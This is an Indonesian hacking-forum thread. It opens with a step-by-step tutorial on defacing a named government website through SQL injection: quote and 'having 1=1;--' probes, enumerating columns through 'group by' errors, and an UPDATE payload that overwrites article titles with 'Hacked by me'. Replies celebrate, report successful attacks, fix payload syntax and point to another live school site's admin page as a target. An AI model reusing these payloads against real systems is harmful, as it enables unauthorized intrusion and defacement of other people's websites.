Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe kek lagu aja yah…
yaudah gak papa kek lagu… yang penting gw tetap ganteng

Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan…

Webnya adalah…

http://pemakaman.jakarta.go.id/
hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′

Oooopppsss keknya terjadi error….

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs…
oke… ayo kita buat error lagi, sampe orgasme… loh!?
kali ini kita membuat error dengan : having 1=1;–
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ having 1=1;–

errornya seperti ini :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230

py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom

sekarang kita cari tau tabel berikutnya…
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;–

error lagi :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

sekarang kita dapat py_Naskah.category
berarti kitambah di urlnya
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error berikutnya :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

urlnya menjadi :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya kita menggunakan cara berikut :

http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;–

Hasilnya

Oke that’s all

Good Luck

http://bl4ckb0t.co.cc/

wew kayakna mantaf neehh

ciba ahhkk

bl4ck gitu loch

hehehe...

iya kali

buseeeeeeet

anak syapa niy orang

wedew kejem banget bang yang atu ini yah ampek web pemakan ja di deface.....

ampun kk.........

malas buat tutornya

kLo diTamBah karaKter Lagi TaPi gaK errOrz gMn DeFaCe Nya??

maksudnya apa yah?
maklum ganteng2 tapi newbie gak sama ama ascii yang master heker

bL4Ck_3n91n3 wrote:

maksudnya apa yah?
maklum ganteng2 tapi newbie gak sama ama ascii yang master heker

aBaNg Bisa Ja nTu...

TuTorial YaNg da DI aTaS no Kudu di KasiH tanda '

DeFace yang gak pke taNda '

gMna aTu aBaNG ??

kYa Ni weB puNya sCuL q siCh

http://sman1-prob.sch.id


HalaMan aDminNya Beda atu BaNG

http://sman1-prob.sch.id/admin.php

yang atas ntu kan cuman buat database yang pake software iis lain lagi klo yang pake sopwer mysql

bL4Ck_3n91n3 wrote:

yang atas ntu kan cuman buat database yang pake software iis lain lagi klo yang pake sopwer mysql

MaKaciii Yaaa BaNg......


bRu Tw aQ


masiH nYuBi NicH..........

kk belack emang kenyen

/me brb belajar lagi

Ajarin donk kaka .

CYB3R_TR0N wrote:

Ajarin donk kaka .

lewat ym atau irc

misi ommm...

numpang belajar

kacian... udah mati.. tapi masih di umbat para hacker...

btw.. bro tadi gw coba.. tapi udah gak jadi di site itu...

ada site lainnya gak?

bL4Ck_3n91n3 wrote:

CYB3R_TR0N wrote:

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

massmissile wrote:

bL4Ck_3n91n3 wrote:

CYB3R_TR0N wrote:

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

kau aja yang dodol

harusnya ntu having 1=1;--
perhatikan baik2 apa bedanya
loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua
halah

bL4Ck_3n91n3 wrote:

massmissile wrote:

bL4Ck_3n91n3 wrote:

CYB3R_TR0N wrote:

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

kau aja yang dodol

harusnya ntu having 1=1;--
perhatikan baik2 apa bedanya
loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua
halah

Ya mav klo salah..hehehehe...Ok deh kaka..kita coba lg ampe bisa...klo ga bisa ya coba trus sampe bisa...oya btw kaka punya YM ga??jd klo nanya lagi biar sip...thx berat brother...

bL4Ck_3n91n3 wrote:

massmissile wrote:

bL4Ck_3n91n3 wrote:

CYB3R_TR0N wrote:

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

kau aja yang dodol

harusnya ntu having 1=1;--
perhatikan baik2 apa bedanya
loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua
halah

BERHASIL JURAGAAAAAANNNNNN BLACK....GIVE ME MORE KNOWLEDGE...

Btw ka black, web yang pake IIS tu yang belakangnya ini bukan..
.aspx
.ascx
.htm
.asmx
.....n masih banyak lg (ane liat di Microsoft ASP.NET Web Matrix...)
Mav klo salah...

Thx berat atas jawabannya...

okok deeh kaka .

aku tunguu iia .

weik...


blajar dulu ah..
masternya mau dateng..

@massmissile

daripada cari celah site lain..

coba dahulu aplikasi di localhost..

sekalian pengenalan jaringan ,server,database